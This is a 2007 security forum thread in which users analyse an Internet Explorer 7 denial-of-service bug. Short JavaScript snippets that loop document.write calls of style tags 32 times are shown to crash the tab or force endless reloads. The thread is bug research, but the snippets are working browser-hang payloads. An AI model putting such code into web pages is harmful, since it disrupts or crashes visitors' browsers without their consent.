Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
The IE <style> DoS
Posted by: shawn
Date: May 07, 2007 11:53PM

I attempted twice to comment to http://ha.ckers.org/blog/20070507/halt-ie70-tab/, and rather than clutter the comments with attempts, I'll post it here where I can preview it...

Weirdness...guessing some sort of a buffer issue, since this still causes the issue (invalid argument line three where it closes the style tag):

<script>
for (var i = 0; i < 32; i++) {
document.write('<style>');
document.write('</style>');
}
</script>

While this doesn't?

<script>
for (var i = 0; i < 31; i++) {
document.write('<style>');
document.write('</style>');
}
</script>

I find it rather odd that combining the two document.write calls does not reproduce it...nor does using any tag other than style. What does the issue itself stem from?

Options: ReplyQuote
Re: The IE <style> DoS
Posted by: rsnake
Date: May 08, 2007 07:04PM

Thank you for posting it here, btw... I tried to save that post, but for some reason it wasn't letting me. Bummer. Also, thank you for doing more analysis on it, I wasn't able to figure out what was going on - but I was also in a huge hurry when I found it. I did notice that I couldn't combine the two styles too - that's why I left them in there. Weird, huh?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: The IE <style> DoS
Posted by: trev
Date: May 09, 2007 11:52AM

Looks more like a failsafe that leaves the parser in a bad state (buffer would overflow at 33 elements and not at 32, so this is likely a chosen threshold). Very interesting...

Edit: Changing the order of document.write statements causes IE7 to reload the page continuously:

<script>
for (var i = 0; i < 32; i++) {
  document.write('</style>');
  document.write('<style>');
}
</script>

No server requests, lots of CPU power burned, but the user interface still stays responsive. And the magic number 32 is still in effect.

I also saw a crash while experimenting with this, trying to reproduce it.

Edit2: I hoped that this reload would allow to keep some JavaScript in memory but so far I was unsuccessful - it really seems to be a clean reload. Which makes the whole affair even weirder, I have trouble imagining a hack that would produce this kind of bug.



Edited 2 time(s). Last edit at 05/09/2007 01:30PM by trev.

Options: ReplyQuote
Re: The IE <style> DoS
Posted by: rsnake
Date: May 20, 2007 02:55PM

You have trouble imagining a hack that produces it or uses it?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: The IE <style> DoS
Posted by: trev
Date: June 01, 2007 06:21AM

No, I really meant what I said - I wonder what kind of code in Internet Explorer produces this behavior and why it is there. If we knew this, we would probably also see whether there is more to this issue.

Options: ReplyQuote
Re: The IE <style> DoS
Posted by: ni4ker6mith
Date: October 16, 2008 10:39AM

thz for ur sharing

Options: ReplyQuote


Sorry, only registered users may post in this forum.